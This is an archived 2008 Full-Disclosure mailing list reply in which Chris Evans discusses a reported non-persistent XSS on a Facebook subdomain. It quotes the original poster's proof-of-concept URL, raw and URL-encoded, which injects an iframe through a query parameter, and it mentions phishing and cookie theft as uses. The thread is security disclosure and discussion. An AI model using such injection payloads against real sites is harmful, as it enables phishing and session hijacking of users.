lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Wed, 10 Dec 2008 16:21:24 -0800
From: "Chris Evans" <scarybeasts@...il.com>
To: "Facebook IsBuggy" <facebookxss@...glemail.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: [FULL DISCLOSURE] Facebook Non Persistant XSS

On Tue, Dec 9, 2008 at 2:41 PM, Facebook IsBuggy
<facebookxss@...glemail.com> wrote:
> Found in August, I tried to alert facebook as quickly as was possible
> - however I received no further correspondence to my communications.
> At time of writing, it was possible to exploit both Firefox 3 and IE 7
> - by simply using an IFRAME or even an object tag. (Dependant on the
> browser target)
>
> This allows you to overwrite the whole page with your choice of script/embed.

Although the domain is 2.channel15.facebook.com, all the significant
Facebook cookies appear to be .facebook.com domain cookies so wouldn't
the more significant attack involve those, rather than some elaborate
phishing scheme?

>
> Vulnerability was found by accident when I was routing my web traffic
> via WebScarab with an advanced list of strings to use with the
> in-built XSS/CSRF tool.
>
> ----------------
>
> http://2.channel15.facebook.com/iframe/7/?pv=49&rev="></script><title>Google</title></head></body><IFRAME
> src="http://www.google.com/" type="text/html" width="100%"
> height="100%"></IFRAME>
>
> Naturally that rather obvious URL could be encoded, or cut down to
> prevent the obvious anomaly. However, I feel the facebook domain name
> itself would be enough to fool most users.

This is not a significant aspect of this vulnerability.
You could go and register http://www.facebook-secure.com/ (or similar)
and that would leave users more than happy to believe & trust it is
Facebook.
Things can be different if the XSS is on an https-supporting login
domain, but that does not seem to be the case here.

Cheers
Chris

>
> http://2.channel15.facebook.com/iframe/7/?pv=49&rev=%22%3E%3C/script%3E%3Ctitle%3EGoogle%3C/title%3E%3C/head%3E%3C/body%3E%3CIFRAME%20src%3D%22http%3A//www.google.com/%22%20type%3D%22text/html%22%20width%3D%22100%25%22%20height%3D%22100%25%22%3E%3C/IFRAME%3E
>
> ----------------
>
> *Similar vulnerabilities had been spoken about on a credit card fraud
> (carding) forum prior to my discovery of this. Possibly for the use of
> phisihing.*
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ